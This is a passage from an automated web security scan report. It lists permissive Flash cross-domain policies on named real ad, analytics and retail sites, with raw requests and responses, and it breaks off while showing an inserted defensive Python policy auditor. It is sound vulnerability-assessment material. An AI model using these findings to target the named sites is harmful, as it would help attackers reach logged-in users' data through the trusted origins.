Host: adsfac.us

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 30 Sep 2008 00:31:21 GMT
Accept-Ranges: bytes
ETag: "0291dc9322c91:0"
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Mon, 09 May 2011 00:59:32 GMT
Connection: close
Content-Length: 125

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
</cross-domain-policy>


5.4. http://at.amgdgt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:01:12 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Mon, 09 May 2011 07:01:12 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

5.5. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 10 May 2011 01:18:23 GMT
Date: Mon, 09 May 2011 01:18:23 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

5.6. http://blooms.1800flowers.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://blooms.1800flowers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: blooms.1800flowers.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:51 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "2b35ca-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=991
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.7. http://bp.specificclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bp.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Mon, 09 May 2011 01:01:04 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

5.8. http://data.cmcore.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.cmcore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.cmcore.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:57 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "2a5925-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=953
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.9. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 01:02:23 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.10. http://idcs.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 01:11:49 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.11. http://metrics.ftd.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:41 GMT
Server: Omniture DC/2.0.0
xserver: www59
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.12. http://pix04.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Mon, 09 May 2011 01:01:08 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.13. http://pixel.fetchback.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:45 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

5.14. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 01:01:01 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 09 May 2011 01:01:01 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

5.15. http://recs.richrelevance.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: recs.richrelevance.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.46
Date: Mon, 09 May 2011 01:00:56 GMT
Content-Type: text/plain
Content-Length: 109
Last-Modified: Tue, 24 Aug 2010 18:01:14 GMT
Connection: close
Accept-Ranges: bytes

...<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

5.16. http://segment-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 01:09:08 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.17. http://wa.proflowers.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.proflowers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wa.proflowers.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 12:08:28 GMT
Server: Omniture DC/2.0.0
xserver: www90
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.18. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 08 May 2011 03:01:05 GMT
Expires: Mon, 09 May 2011 03:01:05 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 79194
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.19. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.186
Date: Mon, 09 May 2011 01:00:44 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

5.20. http://w.sharethis.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 06 May 2011 17:23:38 GMT
ETag: "30106-14a-4a29ec0155a80"
Content-Type: application/xml
Date: Mon, 09 May 2011 01:17:27 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

5.21. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.136.207.55
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

5.22. http://www.ftd.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ftd.com

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: TLTSID=B50374EA79D710790005C701CBAF3F88; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=B50374EA79D710790005C701CBAF3F88; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:00:18 GMT
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
ETag: "fb-4da5239d"
Content-Type: text/xml
Content-Length: 251
Date: Mon, 09 May 2011 01:00:18 GMT
X-Varnish: 729964574
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ftd.com" />
<allow-access-from domain="*.ftdimg.com" />
...[SNIP]...

5.23. http://www.res-x.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.res-x.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.res-x.com

Response

HTTP/1.1 200 OK
Content-Length: 217
Content-Type: text/xml
Last-Modified: Fri, 22 Jan 2010 01:35:21 GMT
Accept-Ranges: bytes
ETag: "fe71562939bca1:b77"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.warnerbros.com"/>
</cross
...[SNIP]...

5.24. http://www.proflowers.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.proflowers.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Sep 2009 20:12:48 GMT
Accept-Ranges: bytes
ETag: "13c92e8d22cca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:07:57 GMT
Connection: close
Content-Length: 492

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="data.pointroll.com" />
<allow-access-from domain="media.pointroll.com" />
<allow-access-from domain="mirror.pointroll.com" />
<allow-access-from domain="pointroll.com" />
<allow-access-from domain="www.pointroll.com" />
...[SNIP]...

6. Silverlight cross-domain policy
There are 4 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
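The rating applied to the Flash policies in section 5 and to the Silverlight policies in this section, as an added example (Python; not code from the report or from any host named in it): it parses a crossdomain.xml or clientaccesspolicy.xml body and assigns the same High / Low / Information severity the findings use (domain="*" or uri="*" is High, a scoped wildcard such as *.ftd.com is Low, a named host is Information), and adds two checks a reviewer wants alongside the rating: secure="false", which lets http:// content use a policy served over https, and header forwarding to any origin. The sample policies at the bottom are constructed to mirror the shapes observed in the responses above; nothing is fetched from the network.

```python
"""Rate Flash (crossdomain.xml) and Silverlight (clientaccesspolicy.xml)
policies the way the findings in sections 5 and 6 are rated.

Added example; not code from the report or from any host named in it.
The sample policies at the bottom are constructed; nothing is fetched.
"""
import xml.etree.ElementTree as ET

_RANK = {"Information": 0, "Low": 1, "High": 2}


def classify_pattern(pattern: str) -> str:
    """Rate one allowed-origin pattern from either policy format."""
    host = pattern.split("://", 1)[-1]   # Silverlight uris may carry a scheme
    if host == "*":
        return "High"          # any origin gets credentialed two-way access
    if "*" in host:
        return "Low"           # every host under the suffix, present or future
    return "Information"       # one named host: trust it fully or remove it


def _worst(severities):
    return max(severities, key=_RANK.__getitem__, default="Information")


def audit_flash_policy(xml_text: str) -> dict:
    """Return {'severity', 'findings'} for a crossdomain.xml body."""
    root = ET.fromstring(xml_text.lstrip("\ufeff"))
    sev, findings = [], []
    for el in root.iter("allow-access-from"):
        dom = el.get("domain", "")
        sev.append(classify_pattern(dom))
        findings.append(f"allow-access-from {dom}: {sev[-1]}")
        if el.get("secure", "true").lower() == "false":
            # Only matters when the policy itself is served over https.
            findings.append(f'secure="false" on {dom}: http:// content may use an https:// policy')
    for el in root.iter("allow-http-request-headers-from"):
        if el.get("domain") == "*" and el.get("headers") == "*":
            sev.append("High")
            findings.append("any origin may send arbitrary request headers")
    return {"severity": _worst(sev), "findings": findings}


def audit_silverlight_policy(xml_text: str) -> dict:
    """Return {'severity', 'findings'} for a clientaccesspolicy.xml body."""
    root = ET.fromstring(xml_text.lstrip("\ufeff"))
    sev, findings = [], []
    for policy in root.iter("policy"):
        allow, grant = policy.find("allow-from"), policy.find("grant-to")
        if allow is None or grant is None:
            continue
        paths = [r.get("path", "") for r in grant.iter("resource")]
        for d in allow.iter("domain"):
            uri = d.get("uri", "")
            sev.append(classify_pattern(uri))
            findings.append(f"allow-from {uri} -> {', '.join(paths)}: {sev[-1]}")
        if allow.get("http-request-headers") == "*":
            findings.append('http-request-headers="*": allowed origins may send arbitrary headers')
    return {"severity": _worst(sev), "findings": findings}


# Constructed samples mirroring the policy shapes quoted in sections 5 and 6.
FLASH_OPEN = """<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>"""

FLASH_SCOPED = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ftd.com" />
<allow-access-from domain="*.ftdimg.com" />
</cross-domain-policy>"""

FLASH_NAMED = """<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.pointroll.com" />
</cross-domain-policy>"""

SILVERLIGHT_OPEN = """<?xml version="1.0" encoding="utf-8"?>
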